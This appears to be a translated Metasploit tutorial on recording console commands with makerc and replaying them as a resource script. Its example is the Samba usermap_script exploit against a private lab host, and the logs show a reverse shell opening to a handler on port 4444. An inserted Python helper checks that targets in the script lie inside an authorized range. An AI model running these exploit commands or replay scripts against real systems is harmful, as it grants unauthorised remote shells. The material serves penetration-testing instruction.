This is done with makerc, which simply records the commands typed into the console; commands unrelated to the attack are recorded as well.
msf > workspace book
[*] Workspace: book
msf > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.168.10.123 00:0c:29:86:6d:33 Linux 2.6.X server
192.168.10.254 00:0c:29:7f:de:c9 Linux 2.6.X server
msf > use exploit/multi/samba/usermap_script
msf exploit(multi/samba/usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 139 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(multi/samba/usermap_script) > set rhost 192.168.10.254
rhost => 192.168.10.254
msf exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP double handler on 192.168.10.102:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 5P2uS1mnOkS0zxL6;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "5P2uS1mnOkS0zxL6\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.10.102:4444 -> 192.168.10.254:54428) at 2018-12-06 08:19:15 -0500
^Z
Background session 1? [y/N] y
# Running this command saves every operation performed since entering msfconsole; afterwards, just delete the unrelated commands from the recorded file
msf exploit(multi/samba/usermap_script) > makerc check_samba.rc
[*] Saving last 14 commands to check_samba.rc ...
View the recorded content
# cat check_samba.rc
# Any superfluous operations in the script can be deleted by hand
workspace book
hosts
use exploit/multi/samba/usermap_script
show options
set rhost 192.168.10.254
exploit
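Before a recorded script is replayed, it is worth stripping the display-only commands and confirming that every `set rhost` target lies inside the authorized test range. The following is an added example, not part of the original post; the function names, the list of display-only commands and the scope range are assumptions.

```python
import ipaddress

# Constructed sample: the recorded check_samba.rc shown above, plus a comment line.
SAMPLE_RC = """\
# leftover note
workspace book
hosts
use exploit/multi/samba/usermap_script
show options
set rhost 192.168.10.254
exploit
"""

def is_noise(line):
    """Assumption: these console commands only display data and can be dropped."""
    if line.split()[0] in {"show", "info", "help", "search"}:
        return True
    # Bare listings only; with arguments they may change state, so keep those.
    return line in {"hosts", "services", "vulns"}

def review_rc(text, scope):
    """Return (kept_lines, out_of_scope_targets) for a resource script."""
    allowed = [ipaddress.ip_network(s) for s in scope]
    kept, out_of_scope = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or is_noise(line):
            continue
        kept.append(line)
        words = line.split()
        is_target = (len(words) >= 3 and words[0].lower() in ("set", "setg")
                     and words[1].lower() in ("rhost", "rhosts"))
        for target in words[2:] if is_target else []:
            try:
                net = ipaddress.ip_network(target, strict=False)
                ok = any(net.subnet_of(a) for a in allowed)
            except (ValueError, TypeError):
                ok = False  # hostnames, ranges, mixed IP versions: review by hand
            if not ok:
                out_of_scope.append(target)
    return kept, out_of_scope

if __name__ == "__main__":
    kept, bad = review_rc(SAMPLE_RC, ["192.168.10.0/24"])  # hypothetical scope
    print("\n".join(kept))
    print("out of scope:", bad)
```

An empty out-of-scope list means every hard-coded target in the script falls inside the supplied ranges; anything listed should be checked by hand before the script is run with `-r`.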
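How to use the recorded script
msfconsole -q -r check_samba.rc
-q do not display the long, flashy Metasploit banner shown at startup
-r followed by the recorded script
# The result is as follows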
[*] Processing check_samba.rc for ERB directives.
resource (check_samba.rc)> workspace book
[*] Workspace: book
resource (check_samba.rc)> hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.168.10.122 00:0c:29:67:b8:28 Windows XP client
192.168.10.123 00:0c:29:86:6d:33 Linux 2.6.X server
192.168.10.128 00:0c:29:f7:89:a7 Windows XP client
192.168.10.254 00:0c:29:7f:de:c9 Linux 2.6.X server
resource (check_samba.rc)> use exploit/multi/samba/usermap_script
resource (check_samba.rc)> show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 139 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
resource (check_samba.rc)> set rhost 192.168.10.254
rhost => 192.168.10.254
resource (check_samba.rc)> exploit
[*] Started reverse TCP double handler on 192.168.10.102:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo xQRN0G6H4nZxw9Jr;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "xQRN0G6H4nZxw9Jr\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.10.102:4444 -> 192.168.10.254:56845) at 2018-12-06 08:28:16 -0500
# At this point a shell session on the target has already been opened